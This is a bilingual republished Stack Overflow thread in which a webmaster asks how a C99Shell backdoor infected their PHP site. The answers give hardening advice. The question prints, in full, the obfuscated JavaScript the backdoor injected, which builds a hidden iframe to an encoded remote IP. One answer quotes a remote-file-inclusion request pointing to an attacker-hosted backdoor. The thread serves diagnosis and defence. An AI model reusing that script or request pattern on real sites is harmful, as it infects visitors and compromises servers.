javascript 保护网站免受后门/PHP.C99Shell aka Trojan.Script.224490
声明:本页面是StackOverFlow热门问题的中英对照翻译,遵循CC BY-SA 4.0协议,如果您需要使用它,必须同样遵循CC BY-SA许可,注明原文地址和作者信息,同时你必须将它归于原作者(不是我):StackOverFlow
原文地址: http://stackoverflow.com/questions/3410274/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, But you must attribute it to the original authors (not me):
StackOverFlow
Protect website from Backdoor/PHP.C99Shell aka Trojan.Script.224490
提问by caw
My website was infected by a trojan script.
我的网站被木马脚本感染。
Somebody managed to create/upload a file called "x76x09.php" or "config.php" into my webspace's root directory. Its size is 44287 bytes and its MD5 checksum is 8dd76fc074b717fccfa30b86956992f8. I've analyzed this file using Virustotal. These results say it's "Backdoor/PHP.C99Shell" or "Trojan.Script.224490".
有人设法创建/上传一个名为“x76x09.php”或“config.php”的文件到我的网站空间的根目录中。它的大小为 44287 字节,其 MD5 校验和为 8dd76fc074b717fccfa30b86956992f8。我已经使用 Virustotal 分析了这个文件。这些结果表明它是“Backdoor/PHP.C99Shell”或“Trojan.Script.224490”。
This file has been executed in the same moment when it was created. So it must have happened automatically. This file added the following malicious code to the end of every index.php on my webspace.
该文件已在创建的同一时刻执行。所以它一定是自动发生的。该文件将以下恶意代码添加到我网站空间上每个 index.php 的末尾。
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
After that code was on my page, users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.
在该代码出现在我的页面上后,用户报告在 Firefox 中弹出一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人在他们的 PC 上安装了 Exploit.Java.CVE-2010-0886.a。
The infection did happen although I have allow_url_fopen and allow_url_include turned off. And my hoster says the file wasn't uploaded via FTP.
尽管我关闭了 allow_url_fopen 和 allow_url_include ,但感染确实发生了。我的主机说该文件不是通过 FTP 上传的。
So my questions are:
所以我的问题是:
- What does the malicious code do? How is it encoded?
- How could the remote file ("x76x09.php" or "config.php") come to my webspace? SQL injection? Virus on my own PC?
- How can I protect my website from such attacks in the future?
- 恶意代码有什么作用?它是如何编码的?
- 远程文件(“x76x09.php”或“config.php”)如何进入我的空间?SQL注入?我自己电脑上的病毒?
- 将来如何保护我的网站免受此类攻击?
Thank you very much in advance! I really need help.
非常感谢您提前!我真的需要帮助。
采纳答案by rook
Your website has been hacked using exploit code.
您的网站已被使用漏洞利用代码入侵。
You must updating everything, including any php libraries you may have installed.
Run phpsecinfoand remove all red and as much yellow as possible by modifying your .htaccess or php.ini.
Remove write privileges from all files and folders your web root (
chmod 500 -R /var/www && chown www-root /var/www) the chown should be whatever user is running php so do a<?php system('whoami');?>to figure that out.Change all passwords, and use sftp or ftps if you can.
Remove
FILEprivileges from your MySQL account that your php application uses.
您必须更新所有内容,包括您可能已安装的任何 php 库。
运行phpsecinfo并通过修改 .htaccess 或 php.ini 尽可能删除所有红色和黄色。
从所有文件和文件夹中删除您的 web 根目录 (
chmod 500 -R /var/www && chown www-root /var/www) 的写入权限,chown 应该是运行 php 的任何用户,因此请执行以下操作<?php system('whoami');?>来弄清楚。更改所有密码,如果可以,请使用 sftp 或 ftps。
FILE从您的 php 应用程序使用的 MySQL 帐户中删除权限。
回答by WeWatchYourWebsite
Many of the websites we've seen that have been hacked are the result of a virus on a PC that's used to FTP files to the infected website. The virus steals the FTP password in a variety of ways - but primarily two.
我们看到的许多被黑客入侵的网站都是由于 PC 上的病毒导致的,该病毒用于将文件通过 FTP 传输到受感染的网站。该病毒以多种方式窃取 FTP 密码 - 但主要是两种方式。
First, if you're using a free FTP program like FileZilla, you should know that these programs store their saved login credentials in a plain text file. It's easy for the virus to find these, read them and send the information to a server which then logs into FTP with valid credentials, copies certain files to itself, infects them then sends them back to the website. Often times it also copies these "backdoor" shell scripts to the website as well so that when the FTP passwords are changed, they can still re-infect the site.
首先,如果您使用的是像 FileZilla 这样的免费 FTP 程序,您应该知道这些程序将它们保存的登录凭据存储在纯文本文件中。病毒很容易找到这些文件,读取它们并将信息发送到服务器,然后服务器使用有效凭据登录 FTP,将某些文件复制到自身,感染它们,然后将它们发送回网站。很多时候它也会将这些“后门”shell 脚本复制到网站上,这样当 FTP 密码被更改时,它们仍然可以重新感染网站。
The virus also "sniffs" the FTP traffic. Since FTP transmits all data including username and password, in plain text, it's easy for the virus to see and steal the information that way as well.
该病毒还会“嗅探”FTP 流量。由于FTP以纯文本形式传输包括用户名和密码在内的所有数据,因此病毒也很容易以这种方式查看和窃取信息。
Quite often, however, when we've seen a backdoor that causes the infection, it's usually the result of Remote File Inclusion vulnerability somewhere on the site. The hackers are constantly trying to add a URL that points to one of their backdoors to the end of any Request string. So in your access logs you might see something like:
然而,很多时候,当我们看到导致感染的后门时,这通常是站点某处远程文件包含漏洞的结果。黑客不断尝试在任何请求字符串的末尾添加一个指向其后门之一的 URL。因此,在您的访问日志中,您可能会看到如下内容:
/path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt????
/path/folder/another/folder/file.php? http://www.hackerswebsite.com/id.txt????
Where the path/folder string is just for demonstration purposes here.
此处路径/文件夹字符串仅用于演示目的。
Sometimes that command works and they are able to copy id.txt to the intended website and thus have a backdoor shell script from which they can manipulate the files.
有时该命令有效,他们能够将 id.txt 复制到预期的网站,从而拥有一个后门 shell 脚本,他们可以从中操作文件。
Change all passwords - FTP, database, cPanel or other administrative interface.
更改所有密码 - FTP、数据库、cPanel 或其他管理界面。
Scan all PCs for viruses.
扫描所有 PC 是否有病毒。
Change to SFTP.
更改为 SFTP。
Check all folders for 755 permissions and all files for 644. This is what is standard.
检查所有文件夹的 755 权限和 644 的所有文件。这是标准的。
If it were SQL injection the infection wouldn't be at the end of the file. It would be somewhere there's a SQL call to generate the content.
如果是 SQL 注入,感染就不会在文件末尾。它会在某个地方有一个 SQL 调用来生成内容。
Yes. With today's backdoors, the attacker can and probably has already viewed the config.php files where your MySQL data is saved.
是的。使用今天的后门,攻击者可以并且可能已经查看了保存 MySQL 数据的 config.php 文件。
Change all passwords.
更改所有密码。
回答by Kranu
You probably have an uploading mechanism on your website that isn't properly filtered. For example, if you have the ability to use a profile picture, somebody could upload a php file and find a way to execute it and gain control of your website.
您的网站上可能有未正确过滤的上传机制。例如,如果您有能力使用个人资料图片,那么有人可以上传一个 php 文件并找到执行它的方法并获得对您网站的控制权。
x76x09.php is an uncensored directory browser/uploader that allows the malicious uploader to gain full control of your website.
x76x09.php 是一个未经的目录浏览器/上传器,它允许恶意上传者完全控制您的网站。
Make sure you temporarily disable all methods of uploading files to your server immediately and delete all instances of malicious code in ALL files.
确保立即暂时禁用将文件上传到服务器的所有方法,并删除所有文件中的所有恶意代码实例。
